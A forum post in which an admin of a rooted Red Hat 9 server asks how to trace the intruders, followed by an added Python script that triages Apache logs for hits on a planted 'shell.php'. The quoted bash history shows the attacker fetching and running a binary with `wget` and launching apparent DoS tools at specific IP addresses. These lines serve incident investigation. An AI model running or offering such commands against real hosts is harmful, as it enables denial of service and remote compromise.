How to trace the hacker?
I've noticed that my RH 9 box had been rooted. chkrootkit and rkhunter report that there are traces of several rootkits installed.
First I tried to clean manually following the recipes found on this forum and elsewhere on the net, but I could not do even the first steps (I could not save /etc/rc.d/rc.sysinit after removing xntps from it - why? I don't know)
So, I decided to choose the way many seem to prefer - asking for a reinstall of the OS and setting up things from backups.
Before I ask for the format, though, it would be nice to find out something about the possible gate for my guests and also what they are doing and who they are.
Is it possible to trace them somehow?
I noticed two possible clues:
1) Clue 1
In /root/bash_history I find
./c4 -h 38.118.142.47
./c4 -h 213.201.220.28
./c4 -h 12.129.211.122
./c4 -d 200.158.70 -s 200
and
wget www.nots.it/samples/images/f3
chmod +x f3
./f3 193.50.212.184 65535 151551
./f3 167.7.9.66 65535 151515
./f3 38.118.142.57 65535 151515
Both c4 and f3 now sit in /usr/.../ and I figure they are used for DoS-like things:
./c4
C4 (v.442) '02 by live
et cetera
./f3
FUDEDOR (v3.0) by bonny - PRIVATE!@#!
et cetera
Could www.nots.it be involved in this activity or would they be victims?
2) Clue 2
/home/somedomain/public_html/tmp/shell.php
This can be found on 3 out of the ~10 domains on the box. According to apache access logs 2 or 3 computers from India visited this file.
How can I find out more? Are there any programmes that would help me?
Thank you for your thoughts.
rdx.
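For the second clue, the Apache access logs are the most useful record of who used shell.php and when, which is also the best lead on how it got there. The script below is an added example and not part of the original post; it assumes the virtual hosts log in Apache's default "combined" format, takes the file name to look for as a parameter (shell.php, as in the post), and runs on a few constructed log lines using documentation-range IP addresses rather than any real ones. It answers three questions a responder wants before the box is reinstalled: which clients touched the file, when the first successful hit happened (a lower bound on the time of compromise), and what else those same clients requested (the likely upload path or vulnerable script).

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache "combined" log format (assumption: the default CustomLog ... combined
# directive). The referer and user-agent fields are what make it more useful
# than the plain "common" format for this kind of triage.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample log lines, not taken from the original post. The client
# addresses are from the RFC 5737 documentation ranges; the path mirrors the
# one mentioned in the post. The last line is deliberately malformed.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2004:02:14:05 +0100] "GET /index.html HTTP/1.1" 200 1523 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
198.51.100.23 - - [10/Mar/2004:02:15:41 +0100] "GET /tmp/shell.php HTTP/1.1" 200 4120 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
198.51.100.23 - - [10/Mar/2004:02:16:02 +0100] "POST /tmp/shell.php HTTP/1.1" 200 388 "http://example.invalid/tmp/shell.php" "Mozilla/4.0 (compatible; MSIE 6.0)"
192.0.2.55 - - [11/Mar/2004:23:48:19 +0100] "GET /tmp/shell.php?q=1 HTTP/1.0" 200 95 "-" "Wget/1.8.2"
203.0.113.7 - - [12/Mar/2004:08:01:00 +0100] "GET /tmp/shell.php HTTP/1.1" 404 289 "-" "Mozilla/5.0"
this line is garbage and must be skipped
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    # Split "?cmd=..." style query strings off the path; their presence is
    # itself a signal that the file was being driven, not just fetched.
    rec["path"], _, rec["query"] = rec["path"].partition("?")
    return rec


def hits_on(log_text, suffix):
    """All records whose request path ends with `suffix` (e.g. 'shell.php')."""
    return [r for r in map(parse_line, log_text.splitlines())
            if r and r["path"].endswith(suffix)]


def summarize_by_client(records):
    """Per-client summary: hit count, first/last seen, methods, statuses, agents."""
    summary = {}
    for r in records:
        s = summary.setdefault(r["ip"], {
            "hits": 0, "first": r["time"], "last": r["time"],
            "methods": set(), "statuses": set(), "agents": set(), "with_query": 0,
        })
        s["hits"] += 1
        s["first"] = min(s["first"], r["time"])
        s["last"] = max(s["last"], r["time"])
        s["methods"].add(r["method"])
        s["statuses"].add(r["status"])
        s["agents"].add(r["ua"])
        if r["query"]:
            s["with_query"] += 1
    return summary


def first_successful_hit(records):
    """Earliest 2xx response: the file existed no later than this."""
    ok = [r for r in records if 200 <= r["status"] < 300]
    return min(ok, key=lambda r: r["time"]) if ok else None


def other_requests(log_text, ips, suffix):
    """Everything else those clients requested, which often points at the
    upload form or vulnerable script through which the file arrived."""
    seen = defaultdict(set)
    for r in map(parse_line, log_text.splitlines()):
        if r and r["ip"] in ips and not r["path"].endswith(suffix):
            seen[r["ip"]].add(r["path"])
    return {ip: sorted(paths) for ip, paths in seen.items()}


if __name__ == "__main__":
    recs = hits_on(SAMPLE_LOG, "shell.php")
    for ip, s in sorted(summarize_by_client(recs).items()):
        print(f"{ip}: {s['hits']} hits, {s['first']} .. {s['last']}, "
              f"methods={sorted(s['methods'])}, statuses={sorted(s['statuses'])}, "
              f"with_query={s['with_query']}, agents={sorted(s['agents'])}")
    first = first_successful_hit(recs)
    print("first successful hit:", first["ip"], first["time"])
    print("other paths by the same clients:",
          other_requests(SAMPLE_LOG, {r["ip"] for r in recs}, "shell.php"))
```

Run it against the real logs by replacing SAMPLE_LOG with the contents of each domain's access_log (and the rotated access_log.N files, since the first upload may be weeks old). Work from a copy of the logs taken before the reinstall, because the reinstall destroys them, and treat the summary as a lead rather than an identification: a 404 from a client that never got a 2xx, like the last address in the sample, may just be a scanner guessing file names.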